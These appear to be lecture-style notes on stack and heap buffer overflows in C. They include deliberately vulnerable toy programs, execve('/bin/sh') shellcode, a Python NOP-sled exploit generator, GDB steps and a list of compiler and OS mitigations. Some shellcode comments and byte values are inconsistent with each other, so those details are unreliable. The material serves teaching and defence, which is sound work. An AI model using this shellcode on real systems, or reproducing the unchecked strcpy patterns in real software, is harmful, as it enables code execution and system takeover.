Buffer Overflows

As discussed in previous notes, a buffer overflow is the process of assigning data to a fixed sized buffer, but exceeding the bounds of the buffer. When a call to a function containing a fixed sized buffer is made, the program at compile time has already allocated the right memory addresses on the stack for that fixed sized buffer. Within the stack frame, there will be all the local variables, in addition to the buffer which we can write to in the normal way.

As we increase address as we go through a buffer, we start at a low memory address, then fill the buffer. After filling the buffer, we have %rbp, the return address and the parameters and the function itself.

Filling the buffer the correct amount is fine, as we don't exceed the size of the buffer or the bounds of our program. If, however, we copy more than the size of the buffer into the buffer itself, then we will run into issues.

Toy Example

This behaviour can be inspected through the use of GDB, by creating a program toy_vuln.c, which contains a fixed size buffer which it copies argv[1] to. When compiling, recent versions of gcc attempt to limit damage to the stack and it annoyingly errors with **** stack smashing detected ***: ./a.out terminated*, or something similar.

#include <stdio.h>
#include <string.h>

int main(int argc, char* argv[]) {
    char buffer[512];
    strcpy(buffer, argv[1]);

    return 0;
}

To bypass this amazingness, we need to tell gcc not to be clever, with -fno-stack-protector, and -ggdb to provide debugging symbols for gdb. When running this program, we generate a crash which violates the availability principle of the CIA triad.

Executing Arbitrary Code

Whilst crashing the program violates the availability aspect of the CIA triad, it does not inherently break the integrity or confidentiality of the program. If only there was a way for us to inject our own code...

Enter the payload! This is a bit of data that we can send into the program that is formatted in such a way that the program thinks the data we are providing is a part of the program code.

As normal, we can fill the buffer with the data we need, but then instead of writing code that will cause the system to segfault (e.g., writing an invalid return address), we change the return address to point to a lower address (remembering the order of the stack), such that when we reach the overwritten ret address, we jump to our code.

First, as we aren't quite sure where our code will be in terms of the stack address, we add some buffer of 0x90 NOPs which we jump to as part of the ret. The CPU then busy waits with the NOPs until it hits the start of our payload.

Due to the way the stack works, the payload has to be put on the stack in reverse byte order. When we then return from the function, it returns to our NOPs, which we then blast through until we hit the malicious code.

The Payload

Now we can reliably get to our own code, we can write a payload or, more likely, use someone else's payload. Here's an example:

# Purpose:
# Invoke sys_execve(char* path, char* argv[], char* envp[]) to run /bin/sh

# main:
_start:
    # Start by putting "/bin/sh\0" => RAX — because ints are stored least byte first
    # in low address, we need to store '\0's'/nib/'
    movabs $0x68732f6e69622f2f, %rax     # '/bin/sh\0' stored in RAX
    push %rax                            # push /bin/sh\0 onto the stack

    # Stack a good place for the filename
    mov %rsp, %rdi                       # sys_execve first arg: pointer to path
    xor %rdx, %rdx                       # Clear EDX (argv[1] = NULL)

    push %rdx                            # push NULL after path to terminate argv[] array
    push %rdi                            # push another pointer to filename as argv[0]
    mov %rsp, %rsi                       # sys_execve second arg: pointer to argv[]

    # execve syscall code on Mac (59 on Linux)
    mov $0x200003b, %eax                 # syscall number for sys_execve
    syscall                              # invoke the syscall

With this payload in assembly, we can get a compiler to convert it to the machine code which will be run. The machine code can then either be passed into the buffer as a string literal or we can store it in some intermediate form to send to the program.

Within a fixed int[size] buffer, the bytes are stored in the opposite direction to characters in strings, this is why we typically have to reverse it to inject.

Deciding How Many NOPs

To decide on the amount of NOPs to include in the program, we take the total amount of memory, subtract the payload, then subtract the size of the return address.

To add some more padding, we repeat the return address 10 times for padding.

In an example, we have 544 bytes total memory, a 28 byte payload, and 8 bytes for the return address. The total number of NOPs is therefore: $$ 544 - 28 - 8*10 = 436 $$

With this, we can now create the exploit. Any exploit further than a trivial buffer overflow will benefit from some simple scripting, be that in Python, Bash or Perl.

We create the program to generate an exploit (here, using Python):

#!/usr/bin/python3
nop = "\x90" * 436
payload = "\x48\xB8\x2F\x62\x69\x6E\x2F\x73\x68\x00\x50\x48\x89\xE7\x31\xD2\x52\x57\x48\x89\xE6\xB8\x3B\x00\x00\x02\x0F\x05"
ret = "\x41" * 80
print(nop+payload+ret)

With this exploit now written, we can pass it into the program, after compiling, then running in GDB:

chmod +x ./exploit.py
gdb ./vulnProg
[...]
gdb-peda$ run $(./exploit.py)

From here, we should then see that the program crashes, as it will segfault because we overwrite the %rsp and %rbp registers. We can still use GDB to examine the memory at these addresses. If we use mem read %rsp %rbp, we should get a lot of NOPs.

Examining the memory, all we have to do is pick a memory offset somehere at a lower address than the payload, then update the script so that the ret address on the stack will contain the address of some of those NOPs.

From here, we can run the exploit with the updated script, and gain access to a shell.

Aside: Executable Bits

Many vendors realised that it would be more secure if only the areas of the programs that were supposed to have executable code in them were allowed to execute in the processor, and the rest of the code (e.g., the stack where there is only supposed to be data) should me marked as not executable.

Binaries are now typically compiled without an executable stack, which can be checked in gdb-peda with checksec.

CIA Triad Implications

As opposed to a naïve implementation which causes the program to crash, we have now updated our code to make the program give us a shell, and therefore full control of the underlying system. We can read any files we want (confidentiality) and also modify any files (integrity).

In terms of the risk model in the program, there is a vulnerability in the system (buffer overflow), with a condition that can cause harm through the injection of an arbitrary payload (threat), with the risk that we lose all confidentiality, integrity and availability of the system.

Other Ways to Buffer Overflow

Although we have so far examined programs that take arguments in at the start to cause our buffer overflow, some programs can be exploited through scanf or strcpy instead. Take a program that scanfs into a buffer of fixed size 8. The string we feed in is not checked for a length before copying it into a buffer.

Within GDB, we can simply run the following:

gdb ./vuln
run <<(repeat 8 printf 'A'; printf "\xef\xbe\xad\xde")

This differs to the syntax used previously as the version that takes inputs as an argument from stdin makes use of the $(./exploit) subshell, which simply executes the program then replaces it with the stdout of the program. Therefore, if the driver program was $(echo hello) it would give us hello as the final version.

This version makes use of a heredoc which is where the code is piped in as keyboard input, but evaluated because we still make use of the subshell.

Heap-based Overflows

Heaps can also contain buffers of data, where the data is usually dynamically sized. This would be an ideal place to store the value of a string we read in through scanf as we could malloc the right amount of memory, then check we actually receive that memory, then safely copy into the memory address.

In the stack, we know the return address of the function and this is predictable enough that it can be overwritten. On the heap, we have to exploit function pointers, as these pointers are stored in structs.

Similar to the buffer overflow, we might have a toy program that stores some information about a person, and this struct might only allocate 64 characters for their name. Take the following toy program as one that is vulnerable to a heap-based buffer overflow:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

struct data { char name[64]; };

struct fp { void (*fp)(); };

void winner(){ printf("level passed!\n"); }

void loser() { printf("level not passed\n"); }

int main(int argc, char** argv){
   struct data *d;
   struct fp *f;

   d = malloc(sizeof(struct data));
   f = malloc(sizeof(struct fp));
   f->fp = loser;

   printf("data is at %p, fp is at %p\n", d, f);

   strcpy(d->name, argv[1]);
   f->fp();
}

Here, we malloc the function pointer directly after the data, so if we write a 64 character string, then some address we want to jump to, then we can exploit a heap-based vulnerability.

Mitigations

Most of these should be set by default, but to ensure that we are mitigating any issues from buffer overflow based vulnerabilities, we should compile using feature flags that protect or mitigate against buffer based overflows. In Visual Studio, this would be through the /GS flag, in GCC, the FORTIFY_SOURCE flag, also StackGuard and ProPolice.

Although this mitigates at compile time by providing some compiler based checking, binaries that have already been compiled before this date would not benefit from the built in protections. At the operating system level, we can also provide some protections, e.g., by randomising the memory address layout, and setting a non-executable stack.

Within our implementations should be the best place to ensure that this is a non-issue, ensuring that we are using linters and static checking to warn us if we miss something. We need to ensure we have proper bounds checking on inputs, use safer functions than gets, scanf and strcpy.

When using dangerous functions (if absolutely necessary), the man pages typically provide some security considerations and alternative recommendations. For example, strcpy has been superseded with strncpy.

Current Prevalence of Buffer Overflow Exploits

Buffer overflows still account for a large proportion of CVEs assigned, with a long list on Mitre CVE, even just for 2024.

The CWE page for the traditional buffer overflow can be found here.